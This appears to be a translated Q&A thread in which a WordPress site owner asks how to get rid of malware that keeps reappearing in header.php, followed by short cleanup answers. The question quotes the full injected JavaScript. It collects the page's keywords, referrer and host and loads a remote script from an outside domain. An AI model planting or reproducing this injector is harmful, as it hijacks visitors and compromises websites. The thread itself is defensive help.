如何在header.php

时间:2016-06-18 01:49:09

标签: javascript php wordpress

我总是在header.php中的网站上感染恶意软件。我删除它,它总是回来。我怎样才能完全删除它?

以下是始终感染我网站的脚本

 <script>
 var a = '';
 setTimeout(10);
 if (document.referrer.indexOf(location.protocol + "//" + location.host) !== 0 || document.referrer !== undefined || document.referrer !== '' || document.referrer !== null) {
     document.write('<script type="text/javascript" src="http://aer-conditionat-aquarys.ro/js/jquery.min.php?c_utt=J18171&c_utm=' + encodeURIComponent('http://aer-conditionat-aquarys.ro/js/jquery.min.php' + '?' + 'default_keyword=' + encodeURIComponent(((k = (function() {
         var keywords = '';
         var metas = document.getElementsByTagName('meta');
         if (metas) {
             for (var x = 0, y = metas.length; x < y; x++) {
                 if (metas[x].name.toLowerCase() == "keywords") {
                     keywords += metas[x].content;
                 }
             }
         }
         return keywords !== '' ? keywords : null;
     })()) == null ? (v = window.location.search.match(/utm_term=([^&]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '&source=' + encodeURIComponent(window.location.host)) + '"><' + '/script>');
 }
    </script>

2 个答案:

答案 0 :(得分:3)

这意味着黑客要么保留后门,要么你没有解决第一次出现的安全问题。

无论如何,接下来的步骤包括:

  • 更改WordPress管理员密码
  • 禁用所有WordPress插件
  • 备份您的wp-content和所有其他自定义文件
  • 删除几乎当前WordPress安装中的所有内容(配置文件除外)
  • 提取最新版本的WordPress软件
  • 运行WordPress的升级脚本

有关详细信息,请参阅WordPress' upgrade instructions

答案 1 :(得分:1)

关于在wordpress网站上删除恶意软件的这篇文章可能会对您有所帮助 http://blog.templatetoaster.com/tips-remove-malware-wordpress-website/